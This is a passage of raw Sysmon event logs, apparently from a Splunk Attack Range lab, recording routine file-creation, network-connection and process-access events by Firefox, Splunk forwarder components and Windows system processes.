Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9A16DEA430AADD159BFA008E64678215,SHA256=E641468739BF52686908B8F7A35529BF3FC6D24CFB2D0480430BCA78DF960D7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=86BACAD153D5D987459669ED27E1B31A,SHA256=971918CF032AABF96E5EF82E4D218527F8A52B6CAA2EC2E50A3AF628A6CA9CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AE321723C60B29EEA0E1E2AAD3E4D2BB,SHA256=8DF0C97D17A65B82D4EEE24651BDD235BA5F3BEC692347EC7AE32DB7902E69F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F03716FB8346B6A59C7B095A26F866FE,SHA256=2CEE11BE2EC052170974D3A39595E8969F3A0B04834A3C753E1EC7A886B0F9CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BEF702C68D2C1F4863A021B0A54B72DA,SHA256=D8C82DA3D71614A04BC7928EB9E15FE96A1ADBA522B265D3C3EAD51F679BB4A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B80F36229DFCBC883064FA19F470B6A7,SHA256=1B475BD3A51EE9B17E675332F75F539277101C6AC401CFCD326C5A44025CFD4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=19AE71E954DAEE5BD2BF2C8E093B71E1,SHA256=2788C44332C626F36660D583D8D36C58EBD30F72272E71485555219F148B0D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=004CBE78171572C59B98DC8DAC36E417,SHA256=1E1B83A32D80A6E7210598E86B21D3FB87B8129B4930286FD53D9074C746777D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1574B539508CB4F416EA4E8A579F5BEE,SHA256=B0EF97479157ADB68EF0E45FDF6605B122FDA31F87C7B83ED8EFBE33D43889C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=634365100B910E3851CCCA93E206CBC6,SHA256=EAB18DD44789CC0D4AAAC6A9FB6D0130601BEDB84F087CFCE2F35076F05DC95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E876E2818C15179EA3FD76959DA85D0,SHA256=8E49AA829CD09950CBE1BD1A9C1D496D0110CB11C55B8C8D7E766DD634EA2CD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:42.441{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9533C040F94DF5D4FE49F925D1BAE8E,SHA256=70A4C5FD273A4469005402E7580A6EDD9EB95FAB59BBA03C9BB5B5A33D2DA9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=239D8D471657A283813C3FB6BB80206A,SHA256=D5636E46A29A0289DEEEB060981A745ED95893E99BA0607585CB6FF87658C8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF2622C17EF987A9490DD87571C3280A,SHA256=C432771DA0CAF8A9236008E0B3892B2625F89EA613C29CA2184E5E83B5061179,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D68D5E7E4E1FB6780C5341EBA2E9E60A,SHA256=24F09209A7A48F14829D5A4F56D2984969C00D0F4CEF7776968B5F53535D7EE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.495{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57475-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:43.459{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA2AA29F0D13FB41ABC89821DDE880,SHA256=E624B3AAEBA68E46BAE448950E2FFF416048A67DFC56C667C8C188C76368853E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:43.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF96773C52AC3FF5F988C02F582CCCAC,SHA256=A6A2194923E228647E9A40872F917568495BEB792DEA3A13EAE26E40DBCAABEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:42.121{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57475-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000810572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:41.814{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-51985-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.585{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61981-false10.0.1.12-8000- 23542300x80000000000000001055021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:44.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83D678A355E872E46DB4762C7277F1B,SHA256=BC3BA55FED1FC3B44C3B28320533513BC6DC53497CA8D62BE08A633E6C9263E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:43.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57476-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:44.235{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5275FD42E5580733DA70CB9C958D9DBE,SHA256=E0EEB3E0EA25DDB185C64A6D712C487948070308D23A5449BAEF8398FE36E012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:45.489{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DA5C11043917A6C0B8271341F1185B,SHA256=085FF0C9C50A8F8905B7248127F0F279D9308ACB46EC1B970AAD2DC12560B5F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:45.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7948C20A9417CE490B013BC97A2D710,SHA256=38CD957C28FA05E01F948F6F2A2E2835CD58FA07BD2784735923B6163B9C4B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.504{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69202B8871AE86D2163ED4E405C70C1A,SHA256=3D0E33F466636EBC764DEC91B852DAE7760811C2BEB94EEA769420B30EB9DDA1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:46.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=276A93E370553B8AC05B2AE98A2DB3B6,SHA256=6DC548FFCF864A1937C9381E69E0D04BCA2B25B606921EEC9E2695C2775C3897,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:47.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFACD84D0BA942AE9DD02EDBC37430F5,SHA256=8B215F98B715C4AE692CD3B3DB3596CFC903988D2B8309B6A7037E48C763BFD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:47.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703F1A3F7A214063BE1A45AAEF71268A,SHA256=ACF4E93DEE2DB8C313ACA89381B7B691D8E8187FBE027F82B85FB68D558EF128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:48.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD21A1248F80927686A06A36275D571,SHA256=61A39B4E8301AA1D425F236077A9EC02CB69BAD4830EC35D1FFBDB5207DF014B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:48.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC497E43FBC548513F40F15CD18B5D26,SHA256=238845991C04BE5F06ADC5F27D4ADB73D72EBF3209FF7F52006ACB8A61431828,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61982-false10.0.1.12-8000- 23542300x80000000000000001055027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:49.570{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D3C85BF5D607D3259AACCA26BF64E7,SHA256=9D8EDFA3F5C5F3A0335A18E8F201DEB03DE4768B59BCF5E3E918BA3B79E1AB65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:48.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57477-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:49.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4425651F7B667214EC270709BD80521,SHA256=0E5C995B5C39AB18476172C1C8625D05532816B8DA3E3A4E33D5D30F6D0C5247,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.917{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.902{466BC892-F892-60EB-017E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9530D7A6467400F4A8CFA66C425A8BC3,SHA256=7DA968BEB3CC09D8F1696ED5B3741A29DB8185D52D509CB613DE9B6E80F1CB05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:50.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=125630661276FF8BACDE0415B078E796,SHA256=5079C33DEB9EC674254A1F21E8F0F2F1F3F6F94908170FEA261E8F4AF5C729F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.501{466BC892-F892-60EB-007E-00000000CF01}80448972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
